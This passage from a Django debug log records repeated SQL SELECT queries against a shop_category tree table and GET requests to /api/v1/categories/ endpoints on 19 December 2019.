2019-12-19 13:56:07,027 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:56:07,030 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:56:07,032 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:56:07,035 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:56:07,038 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:56:07,040 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:56:07,166 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:56:07,171 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:56:07,339 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:56:07,346 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:56:07,350 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:56:07,352 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:56:07,356 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:56:07,358 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:56:07,361 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:56:07,363 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:56:07,365 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:56:07,369 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:56:07,371 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:56:07,374 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:56:07,376 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:56:07,378 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:56:07,382 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:56:07,384 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:56:07,389 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:56:07,392 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:56:07,394 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:56:07,397 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 13:56:07,401 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:56:07,404 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:56:07,405 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:56:07,408 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:56:07,411 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 13:56:07,414 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:56:07,416 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:56:07,420 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:56:07,422 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:56:07,426 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:56:07,428 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:56:07,431 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:56:07,435 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:56:07,437 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:56:07,440 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:56:07,442 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:56:07,444 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:56:07,448 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:56:07,450 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:56:07,453 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:56:07,455 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:56:07,458 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:56:07,460 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:56:07,463 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:56:07,465 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:56:07,468 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:56:07,471 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:56:07,473 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:56:07,731 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:56:07,741 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:56:07,745 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:56:07,749 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 13:56:07,752 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:56:07,756 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:56:07,759 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:56:07,762 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [19/Dec/2019 13:56:07] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 13:56:07,765 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:56:07,767 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:56:07,769 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:56:07,773 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 